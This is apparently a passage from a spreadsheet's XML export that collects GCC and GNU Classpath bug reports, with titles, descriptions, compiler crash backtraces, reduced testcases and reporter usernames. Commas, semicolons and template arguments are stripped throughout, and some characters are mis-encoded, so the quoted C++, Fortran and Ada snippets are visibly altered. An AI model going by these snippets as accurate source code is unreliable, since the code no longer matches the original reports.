z.cpp:3:19: warning: ISO C++ forbids zero-size array â€˜bâ€™ [-Wpedantic]
     const char *b[]
                   ^
{ { a = a b = { b[0] b[1] b[2] b[3] } } c = b[0] }
Aborted (core dumped)</t>
  </si>
  <si>
    <t>GCC-27543</t>
  </si>
  <si>
    <t>[4.2 Regression] attribute ms_struct is now also for rs6000 but not documented</t>
  </si>
  <si>
    <t>According to:
http://gcc.gnu.org/onlinedocs/gcc/Type-Attributes.html#Type-Attributes
ms_struct is now support for also for the RS6000 back-end.</t>
  </si>
  <si>
    <t>GCC-83901</t>
  </si>
  <si>
    <t>[8 Regression] ICE in fold_convert_loc at fold-const.c:2402</t>
  </si>
  <si>
    <t>Since about 20171008 with -fcoarray=single or -fcoarray=lib :
$ cat z1.f90
program p
   character(8) allocatable :: x[:]
   x = 'abc'
   associate (y =&gt; x)
   end associate
end
$ gfortran-8-20180114 -c z1.f90 -fcoarray=single
z1.f90:4:0:
    associate (y =&gt; x)
internal compiler error: in fold_convert_loc at fold-const.c:2402
0x91ee2f fold_convert_loc(unsigned int tree_node* tree_node*)
        ../../gcc/fold-const.c:2401
0x7b3957 trans_associate_var
        ../../gcc/fortran/trans-stmt.c:1804
0x7b3957 gfc_trans_block_construct(gfc_code*)
        ../../gcc/fortran/trans-stmt.c:1921
0x747a97 trans_code
        ../../gcc/fortran/trans.c:1924
0x76eb79 gfc_generate_function_code(gfc_namespace*)
        ../../gcc/fortran/trans-decl.c:6451
0x6fe980 translate_all_program_units
        ../../gcc/fortran/parse.c:6103
0x6fe980 gfc_parse_file()
        ../../gcc/fortran/parse.c:6306
0x744e5f gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-65992</t>
  </si>
  <si>
    <t>Internal compiler error: in gimple_expand_cfg at cfgexpand.c:5658</t>
  </si>
  <si>
    <t>Created attachment 35449
Preprocessed output
When compiling the attached preprocessed file I get:
In file included from ../include/rapidcheck/gen/Build.h:71:0
                 from ../include/rapidcheck.h:20
                 from ../include/rapidcheck-catch.h:3
                 from ../test/gen/BuildTests.cpp:2:
../include/rapidcheck/gen/Build.hpp: In function 'rc::Gen rc::gen::build(rc::Gen const rc::gen::detail::Binding Members = {void ({anonymous}::Foobar::*)(int) void ({anonymous}::Foobar::*)(int int) int {anonymous}::Foobar::*}]':
../include/rapidcheck/gen/Build.hpp:138:8: internal compiler error: in gimple_expand_cfg at cfgexpand.c:5658
 Gen build(Gen gen const detail::Binding &amp;... bs) {
        ^
../include/rapidcheck/gen/Build.hpp:138:8: internal compiler error: Abort trap: 6
GCC version is:
g++-4.9 (Homebrew gcc 4.9.2_1) 4.9.2
However I have also verified on:
gcc-5 (Ubuntu 5.1.0-0ubuntu11~14.04.1) 5.1.0
But then with message:
../include/rapidcheck/gen/Build.hpp:138:8: internal compiler error: in execute at cfgexpand.c:6044</t>
  </si>
  <si>
    <t>shadewind</t>
  </si>
  <si>
    <t>GCC-7015</t>
  </si>
  <si>
    <t>certain __asm__ constructs rejected</t>
  </si>
  <si>
    <t>finish_asm_stmt in its output_operands loop sets 'operand'
to the same value for all output operands thus causing
problems with the mark_addressable call at the bottom of the
loop.
Release:
3.1
Environment:
Cross compilers running on Cygwin (Win2K).
How-To-Repeat:
The problem is obvious and I don't have a specific example
at hand.</t>
  </si>
  <si>
    <t>GCC-61482</t>
  </si>
  <si>
    <t>[4.10 regression] ICE in set_value_range at tree-vrp.c:453 when compiling Firefox ESR 24</t>
  </si>
  <si>
    <t>When compiling Firefox ESR 24 on an 64bit Ubuntu Precise machine with r211488 I get
home/gk/asan/mozilla-esr24/layout/base/FrameLayerBuilder.cpp: In member function 'already_AddRefed mozilla::FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder* mozilla::FrameLayerBuilder::LayerManager* nsIFrame* nsDisplayItem* const nsDisplayList&amp; const mozilla::FrameLayerBuilder::ContainerParameters&amp; const gfx3DMatrix* uint32_t)':
/home/gk/asan/mozilla-esr24/layout/base/FrameLayerBuilder.cpp:2804:1: internal compiler error: in set_value_range at tree-vrp.c:453
 FrameLayerBuilder::BuildContainerLayerFor(nsDisplayListBuilder* aBuilder
 ^
0xd5acae set_value_range
	../.././gcc/tree-vrp.c:452
0xd69f7d adjust_range_with_scev
	../.././gcc/tree-vrp.c:3944
0xd69f7d vrp_visit_phi_node
	../.././gcc/tree-vrp.c:8388
0xca4625 simulate_stmt
	../.././gcc/tree-ssa-propagate.c:325
0xca47a7 process_ssa_edge_worklist
	../.././gcc/tree-ssa-propagate.c:403
0xca5e35 ssa_propagate(ssa_prop_result (*)(gimple_statement_base* edge_def** tree_node**) ssa_prop_result (*)(gimple_statement_base*))
	../.././gcc/tree-ssa-propagate.c:877
0xd6f5a6 execute_vrp
	../.././gcc/tree-vrp.c:9743
0xd6f5a6 execute
	../.././gcc/tree-vrp.c:9824
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[6]: *** [FrameLayerBuilder.o] Error 1
make[6]: *** Waiting for unfinished jobs....
r211210 is still working. I compiled GCC with --prefix=/path/to/my/dir --disable-multilib --enable-languages=cc++</t>
  </si>
  <si>
    <t>gk</t>
  </si>
  <si>
    <t>GCC-39602</t>
  </si>
  <si>
    <t>Clock function freezes in infinite loop when run under wine on linux</t>
  </si>
  <si>
    <t>Here is the program:
----------tst.adb------
with Ada.Calendar
with Ada.Text_IOuse Ada.Text_IO
procedure tst is
    t: Ada.Calendar.Time
begin
    Put_Line (Calling clock)
    t := Ada.Calendar.Clock
    Put_Line (Got clock )
end tst
-------------------
Built program runs fine under windows xp. When the same executable is run under wine on linux it freezes without any printouts. The program is spinning inside the loop in function System.OS_Primitives.Get_Base_Time (lib\gcc\i686-pc-mingw32\4.3.3\adainclude\s-osprim.adb):
----------s-osprim.adb-----------
      --  Here we must be sure that both of these calls are done in a short
      --  amount of time. Both are base time and should in theory be taken
      --  at the very same time.
      loop
         GetSystemTimeAsFileTime (Base_Time'Access)
         if QueryPerformanceCounter (Base_Ticks'Access) = Win32.FALSE then
            pragma Assert
              (Standard.False
               Could not query high performance counter in Clock)
            null
         end if
         GetSystemTimeAsFileTime (Test_Now'Access)
         exit when Test_Now - Base_Time = Max_Elapsed
      end loop
-------------------------
Apparently the assumption does not hold under wine and loop is never exited. What this code tries to achieve is close correlation between times returned by GetSystemTimeAsFileTime and QueryPerformanceCounter. But in actual place where the two values are used (the Clock function) the same effort is not made so it looks like that this approach will not achieve what it is intended for. I suggest removing this loop altogether.</t>
  </si>
  <si>
    <t>vldmrrr</t>
  </si>
  <si>
    <t>GCC-4533</t>
  </si>
  <si>
    <t>mistaken assumption in find_first_not_of and find_last_not_of</t>
  </si>
  <si>
    <t>In bits/basic_string.tcc the function find_first_not_of includes a check in its for loop making sure the size specified in the third argument is non-zero.  The standard doesn't actually say it's invalid to have a zero-width size.  Thus we should be getting __pos back not npos.
Similarly the same goes with find_last_not_of.
Release:
CVS tree</t>
  </si>
  <si>
    <t>GCC-60911</t>
  </si>
  <si>
    <t>[4.9/4.10 Regression] wrong code with -O2 -flto -fipa-pta</t>
  </si>
  <si>
    <t>Created attachment 32646
reduced testcase (gcc.dg/torture/pr30665-1.c)
Output:
$ gcc -O2 -flto -fipa-pta testcase.c
$ ./a.out 
Aborted
Relevant objdump output:
0000000000400530 :
  400530:       48 83 ec 28             sub    rsp0x28
  400534:       48 8d 74 24 10          lea    rsi[rsp+0x10]
  400539:       48 89 e7                mov    rdirsp
  40053c:       c7 04 24 ad 3a 00 00    mov    DWORD PTR [rsp]0x3aad
  400543:       c7 44 24 04 d1 5a 00    mov    DWORD PTR [rsp+0x4]0x5ad1
  40054a:       00 
  40054b:       c7 44 24 10 19 45 00    mov    DWORD PTR [rsp+0x10]0x4519
  400552:       00 
  400553:       c7 44 24 14 a0 5b 00    mov    DWORD PTR [rsp+0x14]0x5ba0
  40055a:       00 
  40055b:       e8 10 01 00 00          call   400670 
  400560:       e8 9b ff ff ff          call   400500 
  400565:       0f 1f 00                nop    DWORD PTR [rax]
abort() is called unconditionally</t>
  </si>
  <si>
    <t>GCC-83930</t>
  </si>
  <si>
    <t>[6 Regression] ICE: RTL check: expected code 'const_int' have 'mem' in simplify_binary_operation_1 at simplify-rtx.c:3302</t>
  </si>
  <si>
    <t>Created attachment 43179
reduced testcase
RTL checking might be needed to reproduce this.
Compiler output:
$ x86_64-pc-linux-gnu-gcc -Og -fno-tree-ccp -mavx512f testcase.c 
testcase.c:10:1: warning: always_inline function might not be inlinable [-Wattributes]
 foo (void)
 ^~~
during RTL pass: combine
testcase.c: In function 'foo':
testcase.c:13:1: internal compiler error: RTL check: expected code 'const_int' have 'mem' in simplify_binary_operation_1 at simplify-rtx.c:3414
 }
 ^
0x675dce rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
        /repo/gcc-trunk/gcc/rtl.c:844
0x681a5b simplify_binary_operation_1
        /repo/gcc-trunk/gcc/simplify-rtx.c:3414
0xdaf9e5 simplify_binary_operation(rtx_code machine_mode rtx_def* rtx_def*)
        /repo/gcc-trunk/gcc/simplify-rtx.c:2171
0x166457f combine_simplify_rtx
        /repo/gcc-trunk/gcc/combine.c:5682
0x1669ec7 subst
        /repo/gcc-trunk/gcc/combine.c:5604
0x1669bed subst
        /repo/gcc-trunk/gcc/combine.c:5542
0x1669807 subst
        /repo/gcc-trunk/gcc/combine.c:5471
0x166be6e try_combine
        /repo/gcc-trunk/gcc/combine.c:3354
0x1675334 combine_instructions
        /repo/gcc-trunk/gcc/combine.c:1299
0x1675334 rest_of_handle_combine
        /repo/gcc-trunk/gcc/combine.c:14856
0x1675334 execute
        /repo/gcc-trunk/gcc/combine.c:14901
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-256801-checking-yes-rtl-df-extra-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/8.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --with-cloog --with-ppl --with-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-256801-checking-yes-rtl-df-extra-amd64
Thread model: posix
gcc version 8.0.1 20180117 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-25422</t>
  </si>
  <si>
    <t>[4.2 Regression] gcc.dg/20031012-1.c and gcc.dg/weak/weak-3.c (and a couple others) fails forgot to update for new option -Walways-true</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/20031012-1.c  (test for warnings line 13)
FAIL: gcc.dg/weak/weak-3.c  (test for warnings line 57)
FAIL: g++.old-deja/g++.mike/warn8.C  (test for warnings line 14)
FAIL: g++.old-deja/g++.mike/warn8.C  (test for warnings line 16)
Those all fail because the tests were forgot to be updated for the new option -Walways-true.</t>
  </si>
  <si>
    <t>GCC-59728</t>
  </si>
  <si>
    <t>[4.9 Regression] gcc.target/mips/octeon-baddu-1.c is failing</t>
  </si>
  <si>
    <t>The test gcc.target/mips/octeon-baddu-1.c started failing for me on Dec 10 2013. The test expects to find 4 baddu instructions and no andi instructions when compiled with -march=octeon but is now using 3 daddu instructions and 1 addu instruction instead of baddu instructions and it is also generating andi instructions.  I am not sure exactly what checkin caused this change or if the change in generated code is correct or not.
PASS: gcc.target/mips/octeon-baddu-1.c  -O2  (test for excess errors)
FAIL: gcc.target/mips/octeon-baddu-1.c  -O2   scan-assembler-times \tbaddu\t 4
FAIL: gcc.target/mips/octeon-baddu-1.c  -O2   scan-assembler-not \tandi\t</t>
  </si>
  <si>
    <t>GCC-38227</t>
  </si>
  <si>
    <t>gcc fails to correctly pass arguments with ms_abi function pointers</t>
  </si>
  <si>
    <t>When calling function pointers that have been marked with __attribute__((ms_abi)) the arguments will not be passed correctly.
A simple testcase is enough to expose the wrong behavior.</t>
  </si>
  <si>
    <t>m.b.lankhorst</t>
  </si>
  <si>
    <t>GCC-10660</t>
  </si>
  <si>
    <t>(ICE) segfault with -O -Wunreachable-code -fgcse</t>
  </si>
  <si>
    <t>compiling the attached file with options -O -Wunreachable-code -fgcse causes an ICE
bug.cc: In static member function `static MyName* MyName::newName(void*)':
bug.cc:29: internal error: Segmentation fault
The attached file is the smallest I could derive from the original file on which we noticed the ICE and still get this ICE
Release:
gcc 3.2.3
Environment:
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/specs
Configured with: /var/tmp/portage/gcc-3.2.3-r1/work/gcc-3.2.3/configure --prefix=/usr --bindir=/usr/i686-pc-linux-gnu/gcc-bin/3.2 --includedir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/include --datadir=/usr/share/gcc-data/i686-pc-linux-gnu/3.2 --mandir=/usr/share/gcc-data/i686-pc-linux-gnu/3.2/man --infodir=/usr/share/gcc-data/i686-pc-linux-gnu/3.2/info --enable-shared --host=i686-pc-linux-gnu --target=i686-pc-linux-gnu --with-system-zlib --enable-languages=cc++adaf77objcjava --enable-threads=posix --enable-long-long --disable-checking --enable-cstdio=stdio --enable-clocale=generic --enable-__cxa_atexit --enable-version-specific-runtime-libs --with-gxx-include-dir=/usr/lib/gcc-lib/i686-pc-linux-gnu/3.2.3/include/g++-v3 --with-local-prefix=/usr/local --enable-shared --enable-nls --without-included-gettext
Thread model: posix
gcc version 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r1 propolice)
How-To-Repeat:
g++  -O -Wunreachable-code -fgcse -c -o bug.o bug.cc</t>
  </si>
  <si>
    <t>denys.duchier</t>
  </si>
  <si>
    <t>GCC-69772</t>
  </si>
  <si>
    <t>enum class bool comparison error</t>
  </si>
  <si>
    <t>The below code comparing a type of enum class bool fails to compile with this error:
main.cpp: In function 'int main()':
main.cpp:10:47: error: could not convert 'test' from 'Test' to 'bool'
     const char *p = Test::Foo == test ? a : b
enum class Test : bool
{
    Foo
    Bar
}
int main()
{
    Test test = Test::Foo
    const char *p = Test::Foo == test ? a : b
    (void)p
}
Changing the underlying type of the enum to other types (short int or long) works.  Also returning other types in the ternary (such as int) works.</t>
  </si>
  <si>
    <t>claytrychta</t>
  </si>
  <si>
    <t>GCC-67935</t>
  </si>
  <si>
    <t>Created attachment 36484
compiled with command: g++ -std=c++11 main.cpp
main.cpp is the smallest code for generating the compiling error.
compile command: g++ -std=c++11 main.cpp
platform: archlinux
gcc version: 5.2
error info:
internal compiler error: Segmentation fault
  void serialize(_T &amp; o)
workaround 1:
change 'typedef struct { ... } base_t' to 'typedef struct xxx {...} base_t'
workaround 2:
move the '#include ' in the first line.
when change the 'array' to 'vector' (both header and declaration of 'p' in base_t) result become:
internal compiler error: Segmentation fault
 typedef struct {
                ^</t>
  </si>
  <si>
    <t>niqingliang2003</t>
  </si>
  <si>
    <t>GCC-69823</t>
  </si>
  <si>
    <t>[6 Regression] internal compiler error: in create_pw_aff_from_tree at graphite-sese-to-poly.c:445</t>
  </si>
  <si>
    <t>The following testcase ICEs for me on aarch64 at -O3 -floop-interchange:
int a d e f
int b[1]
int c[50]
void
fn1 ()
{
  for ( d)
    for ( d d++)
      {
        f = b[e] || a % e
        c[1] = c[e]
      }
}
mycrash.c: In function 'fn1':
mycrash.c:5:1: internal compiler error: in create_pw_aff_from_tree at graphite-sese-to-poly.c:445
 fn1 ()
 ^~~
0x106b5aa create_pw_aff_from_tree
        $TOP/gcc/graphite-sese-to-poly.c:445
0x106be73 add_condition_to_pbb
        $TOP/gcc/graphite-sese-to-poly.c:458
0x106be73 add_conditions_to_domain
        $TOP/gcc/graphite-sese-to-poly.c:525
0x106be73 build_iteration_domains
        $TOP/gcc/graphite-sese-to-poly.c:1017
0x106c0df build_iteration_domains
        $TOP/gcc/graphite-sese-to-poly.c:1040
0x106ca99 build_poly_scop(scop*)
        $TOP/gcc/graphite-sese-to-poly.c:1364
0x1056e2e graphite_transform_loops()
        $TOP/gcc/graphite.c:319
0x1056fa6 graphite_transforms
        $TOP/gcc/graphite.c:356
0x1056fa6 execute
        $TOP/gcc/graphite.c:433
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
This is using ISL 0.15</t>
  </si>
  <si>
    <t>CLASSPATH-27940</t>
  </si>
  <si>
    <t>CairoGraphics2D doesn't support custom Paint classes</t>
  </si>
  <si>
    <t>When trying out the Metouia L&amp;F (http://mlf.sourceforge.net/) I hit an UnsupportedOperationException in CairoGraphics2D.setPaint(). It tried to set a paint object of the type net.sourceforge.mlf.metouia.MetouiaGradients . We need to support custom paints somehow.</t>
  </si>
  <si>
    <t>GCC-12009</t>
  </si>
  <si>
    <t>g++.dg compat.exp fail to crosscompile testcases</t>
  </si>
  <si>
    <t>g++.dg/compat/compat.exp sets LD_LIBRARY_PATH properly
for native build/test but that setting causes compilation
to fail when building/testing a crosscompiler.
The simplest fix is to not touch LD_LIBRARY_PATH et al when
crosscompiling and let the remote target worry about the runtime
environment.
Please apply
http://www.kegel.com/crosstool/current/gcc-3.4-20030813-patches/compat.exp.patch
Thanks!</t>
  </si>
  <si>
    <t>GCC-43</t>
  </si>
  <si>
    <t>friend operators</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Sun 08 Aug 1999 12:39:35 +0200
 There seems to be a problem with specialised template friend
 functions in a class template when there are also member functions
 with the same name. The requested info for a bug report is below. (I
 have the same problem under Linux on my notebook - so this seems to
 be platform independent the same problem arises if namespace is not
 used the same problems arises if instead of operator- we have plain
 functions). Thanks.
 g++ -v --save-temps specialized_template_friend_member_function_overload_problem.C
 ---
 Reading specs from /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/specs
 gcc version 2.95 19990728 (release)
  /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -Dsparc -Dsun -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem(unix) -Asystem(svr4) -D__EXCEPTIONS -D__GCC_NEW_VARARGS__ -Acpu(sparc) -Amachine(sparc) specialized_template_friend_member_function_overload_problem.C specialized_template_friend_member_function_overload_problem.ii
 GNU CPP version 2.95 19990728 (release) (sparc)
 #include ... search starts here:
 #include  search starts here:
  /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/../../../../include/g++-3
  /KM/usr/naeher/gcc-2.95/include
  /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/../../../../sparc-sun-solaris2.6/include
  /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
 End of omitted list.
  /KM/usr/naeher/gcc-2.95/lib/gcc-lib/sparc-sun-solaris2.6/2.95/cc1plus specialized_template_friend_member_function_overload_problem.ii -quiet -dumpbase specialized_template_friend_member_function_overload_problem.cc -version -o specialized_template_friend_member_function_overload_problem.s
 GNU C++ version 2.95 19990728 (release) (sparc-sun-solaris2.6) compiled by GNU C version 2.7.2.3.
 specialized_template_friend_member_function_overload_problem.C: In instantiation of `CGAL::V':
 specialized_template_friend_member_function_overload_problem.C:54:   instantiated from here
 specialized_template_friend_member_function_overload_problem.C:31: invalid use of undefined type `class CGAL::V'
 specialized_template_friend_member_function_overload_problem.C:33: forward declaration of `class CGAL::V'
 specialized_template_friend_member_function_overload_problem.C:31: confused by earlier errors bailing out
 ---
 specialized_template_friend_member_function_overload_problem.ii:
 # 1 specialized_template_friend_member_function_overload_problem.C
 namespace CGAL{
 template  class P
 template  class V
 class O {}
 template    V operator-( const P
 template 
 class P
 {
   T _a
   P( const V&amp; v) : _a(v.x()) {}
  public:
   P( const T&amp; a) : _a(a) {}
   T x() { return _a }
 }
 template 
 class V
 {
   T _b
   V( const P&amp; p) : _b(p.x()) {}
  public:
   V( const T&amp; a) : _b(a) {}
	  V operator-()
   friend V operator-( const P
   T x() { return _b }
 }
 template  
 V 
 operator-( const P&amp; p const O&amp; )
 { return V( p) }
 template 
 V
 V::operator-()
 { return V( -_b) }
 }  
 int
 main()
 {
   CGAL::P a(1.0)
   CGAL::V b(1.0)
   return 0
 }
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-22621</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] Member function overloading introduces syntax errors</t>
  </si>
  <si>
    <t>This bug was discovered simultaneously with #22618 but it seemed different
enough to warrant a bug report of its own.
Since foo::f also names a non-static function the compiler apparently
treats the full name as malformed pointer-to-member expression inside the
class itself even though the context is pointer-to-function.
struct foo {
    typedef int (*fun)(int)
    static int f(int)    // overload between static &amp; non-static
    int f()
    static int g(int)    // non-overloaded static
}
template
struct f_obj {
    // something ..
}
f_obj&lt;   // OK
f_obj  b   // OK (note: a and b are of the same type)
int foo::f()
{
   f_obj&lt;   // OK
   f_obj  b   // ERROR: foo::f cannot be a constant expression
   f_obj&lt;   // OK
   f_obj  d   // OK
}</t>
  </si>
  <si>
    <t>squell</t>
  </si>
  <si>
    <t>CLASSPATH-22901</t>
  </si>
  <si>
    <t>Missing items in docs for java.awt.image.BufferedImage</t>
  </si>
  <si>
    <t>While browsing the online docs for BufferedImage I noticed that all but the first 'static int' fields in the Fields Summary are missing (perhaps because they are declared in the source using a comma separated list of declarations).</t>
  </si>
  <si>
    <t>GCC-43357</t>
  </si>
  <si>
    <t>fixincludes/tests/base/iso/math_c99.h check fails</t>
  </si>
  <si>
    <t>--- /home/dave/gnu/gcc/gcc/fixincludes/tests/base/iso/math_c99.h        Wed May 
28 21:33:13 2008
***************
*** 4955 ****
                           ? __builtin_signbitf(x) \
                           : sizeof(x) == sizeof(long double) \
                             ? __builtin_signbitl(x) \
!                            : __builtin_signbit(x))
  #endif  /* SOLARIS_MATH_8_CHECK */
--- 4955 ----
                           ? __builtin_signbitf(x) \
                           : sizeof(x) == sizeof(long double) \
                             ? __builtin_signbitl(x) \
!                            : __builtin_signbit(x))
  #endif  /* SOLARIS_MATH_8_CHECK */</t>
  </si>
  <si>
    <t>GCC-60002</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in skip_artificial_parms_for() with -O2 -fcompare-debug -fdeclone-ctor-dtor -fipa-cp-clone</t>
  </si>
  <si>
    <t>Created attachment 31994
reduced testcase
Compiler output:
$ gcc -O2 -fcompare-debug -fdeclone-ctor-dtor -fipa-cp-clone testcase.C
==2803== Invalid read of size 2
==2803==    at 0x7A87C0: skip_artificial_parms_for(tree_node const* tree_node*) (tree.h:2822)
==2803==    by 0x7282E0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1453)
==2803==    by 0x72A1A5: decl_as_string(tree_node* int) (error.c:2732)
==2803==    by 0x7DD572: cxx_printable_name_internal(tree_node* int bool) (tree.c:1979)
==2803==    by 0xD2815E: dump_enumerated_decls(_IO_FILE* int) (tree-dfa.c:760)
==2803==    by 0xD201CC: (anonymous namespace)::pass_cleanup_cfg_post_optimizing::execute() (tree-cfgcleanup.c:1079)
==2803==    by 0xBF3B09: execute_one_pass(opt_pass*) (passes.c:2229)
==2803==    by 0xBF3DA5: execute_pass_list(opt_pass*) (passes.c:2282)
==2803==    by 0x931C98: expand_function(cgraph_node*) (cgraphunit.c:1764)
==2803==    by 0x933BEB: compile() (cgraphunit.c:1898)
==2803==    by 0x9343F4: finalize_compilation_unit() (cgraphunit.c:2319)
==2803==    by 0x71C20E: cp_write_global_declarations() (decl2.c:4431)
==2803==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==2803== 
==2803== Invalid read of size 2
==2803==    at 0x7A87C0: skip_artificial_parms_for(tree_node const* tree_node*) (tree.h:2822)
==2803==    by 0x7282E0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1453)
==2803==    by 0x72A20E: decl_as_string_translate(tree_node* int) (error.c:2740)
==2803==    by 0x7DD572: cxx_printable_name_internal(tree_node* int bool) (tree.c:1979)
==2803==    by 0x729872: cp_diagnostic_starter(diagnostic_context* diagnostic_info*) (error.c:3081)
==2803==    by 0x15BB688: diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*) (diagnostic.c:798)
==2803==    by 0x15BC3EF: internal_error(char const* ...) (diagnostic.c:1136)
==2803==    by 0xCE85CF: crash_signal(int) (toplev.c:337)
==2803==    by 0x5A592DF: ??? (in /lib64/libc-2.17.so)
==2803==    by 0x7A87BF: skip_artificial_parms_for(tree_node const* tree_node*) (method.c:2013)
==2803==    by 0x7282E0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1453)
==2803==    by 0x72A1A5: decl_as_string(tree_node* int) (error.c:2732)
==2803==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==2803== 
==2803== 
==2803== Process terminating with default action of signal 11 (SIGSEGV)
==2803==  Access not within mapped region at address 0x0
==2803==    at 0x7A87C0: skip_artificial_parms_for(tree_node const* tree_node*) (tree.h:2822)
==2803==    by 0x7282E0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1453)
==2803==    by 0x72A20E: decl_as_string_translate(tree_node* int) (error.c:2740)
==2803==    by 0x7DD572: cxx_printable_name_internal(tree_node* int bool) (tree.c:1979)
==2803==    by 0x729872: cp_diagnostic_starter(diagnostic_context* diagnostic_info*) (error.c:3081)
==2803==    by 0x15BB688: diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*) (diagnostic.c:798)
==2803==    by 0x15BC3EF: internal_error(char const* ...) (diagnostic.c:1136)
==2803==    by 0xCE85CF: crash_signal(int) (toplev.c:337)
==2803==    by 0x5A592DF: ??? (in /lib64/libc-2.17.so)
==2803==    by 0x7A87BF: skip_artificial_parms_for(tree_node const* tree_node*) (method.c:2013)
==2803==    by 0x7282E0: dump_function_decl(cxx_pretty_printer* tree_node* int) (error.c:1453)
==2803==    by 0x72A1A5: decl_as_string(tree_node* int) (error.c:2732)
==2803==  If you believe this happened as a result of a stack
==2803==  overflow in your program's main thread (unlikely but
==2803==  possible) you can try to increase the size of the
==2803==  main thread stack using the --main-stacksize= flag.
==2803==  The main thread stack size used in this run was 16777216.
gcc: internal compiler error: Segmentation fault (program valgrind)
0x40d36e execute
        /mnt/svn/gcc-trunk/gcc/gcc.c:2841
0x40d5e9 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:4641
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
0x40dd62 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5295
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
0x40dd62 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5295
0x40d95e do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5410
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
0x40dd62 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5295
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
0x40dd62 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5295
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
0x40dd62 do_spec_1
        /mnt/svn/gcc-trunk/gcc/gcc.c:5295
0x410351 process_brace_body
        /mnt/svn/gcc-trunk/gcc/gcc.c:5924
0x410351 handle_braces
        /mnt/svn/gcc-trunk/gcc/gcc.c:5838
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r207294 - crash
4.8 - unrecognized command line option '-fdeclone-ctor-dtor'</t>
  </si>
  <si>
    <t>GCC-20861</t>
  </si>
  <si>
    <t>Internal procedure cannot be actual argument</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
CALL DD(TT)
CONTAINS
SUBROUTINE DD(F)
  INTERFACE
   SUBROUTINE F(X)
    REAL :: X
   END SUBROUTINE F
  END INTERFACE
END SUBROUTINE DD
SUBROUTINE TT(X)
  REAL :: X
END SUBROUTINE
END</t>
  </si>
  <si>
    <t>GCC-34383</t>
  </si>
  <si>
    <t>ICE on Usage of default function template argument</t>
  </si>
  <si>
    <t>#include 
template class Comp=std::tr1::is_same&gt; void
STATIC_ASSERT( T2 t2=T2() T1 t1=T1() )
{
  static_assert( Comp::value  )
}
int main()
{
        unsigned int b
        STATIC_ASSERT(b)
}
g++-4.3.0  -std=c++0x  -c -o test.o test.cpp
/usr/lib/gcc/i686-pc-linux-gnu/4.3.0/include/g++-v4/tr1_impl/type_traits: In function 'int main()':
